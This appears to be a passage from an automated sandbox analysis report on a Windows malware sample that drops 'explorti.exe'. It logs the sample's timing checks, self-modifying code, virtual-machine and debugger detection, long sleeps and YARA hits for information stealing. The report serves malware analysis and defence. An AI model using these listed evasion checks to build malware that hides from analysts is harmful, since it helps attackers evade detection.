Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D08BE second address: 56D091D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FF3B2065DB4h 0x00000011 jmp 00007FF340810300h 0x00000016 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001d jmp 00007FF340810300h 0x00000022 mov ecx, esi 0x00000024 jmp 00007FF340810300h 0x00000029 je 00007FF3B2065D8Ah 0x0000002f pushad 0x00000030 mov di, cx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D091D second address: 56D09AA instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF34080AB16h 0x00000008 xor cx, 5CB8h 0x0000000d jmp 00007FF34080AB0Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 test byte ptr [76FB6968h], 00000002h 0x0000001d jmp 00007FF34080AB16h 0x00000022 jne 00007FF3B2060555h 0x00000028 jmp 00007FF34080AB10h 0x0000002d mov edx, dword ptr [ebp+0Ch] 0x00000030 jmp 00007FF34080AB10h 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FF34080AB17h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D09AA second address: 56D09FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 6DEDEB4Ah 0x00000008 mov edi, 7AA77216h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007FF3408102FCh 0x00000016 xchg eax, ebx 0x00000017 jmp 00007FF340810300h 0x0000001c xchg eax, ebx 0x0000001d jmp 00007FF340810300h 0x00000022 push eax 0x00000023 jmp 00007FF3408102FBh 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D09FA second address: 56D0A00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D0A4C second address: 56D0A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D0A52 second address: 56D0A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D0A56 second address: 56D0A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF3408102FAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D0A6B second address: 56D0AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF34080AB11h 0x00000009 add ecx, 5D1B2BA6h 0x0000000f jmp 00007FF34080AB11h 0x00000014 popfd 0x00000015 push esi 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebx 0x0000001b jmp 00007FF34080AB0Ah 0x00000020 mov esp, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D0AB0 second address: 56D0AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56D0AB4 second address: 56D0AD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56E0C9C second address: 56E0D07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF340810306h 0x0000000f push eax 0x00000010 jmp 00007FF3408102FBh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FF340810306h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e mov ecx, 607BC2CDh 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FF340810308h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56E0D07 second address: 56E0D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF34080AB17h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56E0D38 second address: 56E0D50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF340810304h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56E09BE second address: 56E09C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: 56E09C3 second address: 56E09F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810302h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF340810307h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe Special instruction interceptor: First address: D9EAC1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\11NdzR12PS.exe Special instruction interceptor: First address: F4CDBA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\11NdzR12PS.exe Special instruction interceptor: First address: F759FE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 6FEAC1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 8ACDBA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 8D59FE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\11NdzR12PS.exe Code function: 0_2_05750D23 rdtsc 0_2_05750D23
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1239
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 430
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1294
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1276
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7804 Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7780 Thread sleep count: 1239 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7780 Thread sleep time: -2479239s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760 Thread sleep count: 430 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760 Thread sleep time: -12900000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7880 Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7776 Thread sleep count: 1294 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7776 Thread sleep time: -2589294s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7788 Thread sleep count: 1276 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7788 Thread sleep time: -2553276s >= -30000s
Source: C:\Users\user\Desktop\11NdzR12PS.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: explorti.exe, explorti.exe, 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: explorti.exe, 00000005.00000002.2903017790.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorti.exe, 00000005.00000002.2903017790.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWU+vE
Source: 11NdzR12PS.exe, 00000000.00000002.1706850524.0000000000F29000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1730187640.0000000000889000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\11NdzR12PS.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\11NdzR12PS.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\11NdzR12PS.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SIWVID
Source: C:\Users\user\Desktop\11NdzR12PS.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\11NdzR12PS.exe Code function: 0_2_05750D23 rdtsc 0_2_05750D23
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 5_2_006C645B mov eax, dword ptr fs:[00000030h] 5_2_006C645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 5_2_006CA1C2 mov eax, dword ptr fs:[00000030h] 5_2_006CA1C2
Source: C:\Users\user\Desktop\11NdzR12PS.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: explorti.exe, explorti.exe, 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Program Manager
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 5_2_006AD312 cpuid 5_2_006AD312
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 5_2_006ACB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 5_2_006ACB1A

Stealing of Sensitive Information

Source: Yara match File source: 1.2.explorti.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.explorti.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.11NdzR12PS.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000003.2279106197.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1665922474.0000000005530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1689349106.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1730077217.0000000000691000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1706599443.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY